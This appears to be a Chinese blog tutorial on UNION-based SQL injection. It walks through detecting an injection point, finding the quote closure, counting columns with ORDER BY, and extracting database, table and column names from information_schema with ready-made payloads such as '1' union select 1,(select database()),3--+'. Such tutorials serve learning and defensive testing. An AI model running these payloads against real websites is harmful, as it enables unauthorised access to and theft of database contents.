sql注入之union注入
2024-09-08 01:44:45
联合查询注入利用的前提: 必须要有回显
联合查询过程:
- 判断是否存在注入点
- 判断是什么类型注入(字符型or数字型)
- 判断闭合方式
- 查询列数个数(order by)
5, 获得数据库名 - 获得表名
- 获得字段名
1. 判断是否存在注入点 可以用(')单引号显示数据库错误信息或者页面回显不同
2. 判断什么类型(字符型or数字型) 用and 1=1和and 1=2 如果页面没有变化说明不是数字型 ,如果有明显变化说明是数字型
3. 判断闭合方式 单引号or双引号..看报错信息、
4. 判断列数个数(order by) order by在mysql中查询结果是按照指定字段进行排序的,例如数据库中有3个字段,order by查询就是1,2,3
5. 查看数据库信息and获得数据库名 使用group_concat()
基本语句:
1' union select 1,(select database()),3--+
1' union select 1,(select group_concat(schema_name) from information_schema.schemata) --+
6. 获得表名
基本语句:
0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
7. 获得字段名
基本语句:
0' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='表名'),3 --+
最新文章
- [LeetCode] Best Time to Buy and Sell Stock 买卖股票的最佳时间
- jQuery 事件方法
- 【JavaScript忍者秘籍】定时器
- mac 终端启动 jboss 停留在(Starting) 不能启动joss
- JsRender实用教程(tag else使用、循环嵌套访问父级数据)
- OpenCV学习笔记:MAT解析
- 20160408javaweb之JDBC ---PreparedStatement
- bithrtree
- prim模板题
- LSH、ITQ、SKLSH图像检索实验实现(包含源码下载地址)
- swift http请求返回json数据和分析
- POJ 1742 Coins ( 单调队列解法 )
- 使用D3 Geo模块画澳大利亚地图
- [epub] epub.js的ePubReader函数报URI malformed错误的解决办法
- 【RabbitMQ系列】队列、绑定、交换器
- 实体类双向映射进行Json序列化时出现无限循环的解决问题
- (1)编译安装lamp三部曲之apache-技术流ken
- python 开发环境配置
- thinkphp设置默认访问的模块
- CPUFreq驱动
热门文章
- Java编码和字符集(详解)
- echarts折线图,数据切换时(最近七天)绘图不合理现象
- Qiskit 安装指南
- [JLOI2011]飞行路线 题解
- JVM简单入门
- 我要进大厂之大数据ZooKeeper知识点(2)
- python-基础入门-3(对文件操作)
- 应用程序-特定 权限设置并未向在应用程序容器不可用 SID (不可用)中运行的地址 LocalHost (使用 LRPC) 中的用户...的 COM 服务器应用程序的 本地 激活 权限。此安全权限可以使用组件服务管理工具进行修改。
- mysql官网下载yum
- python 中 try...finally... 的优雅实现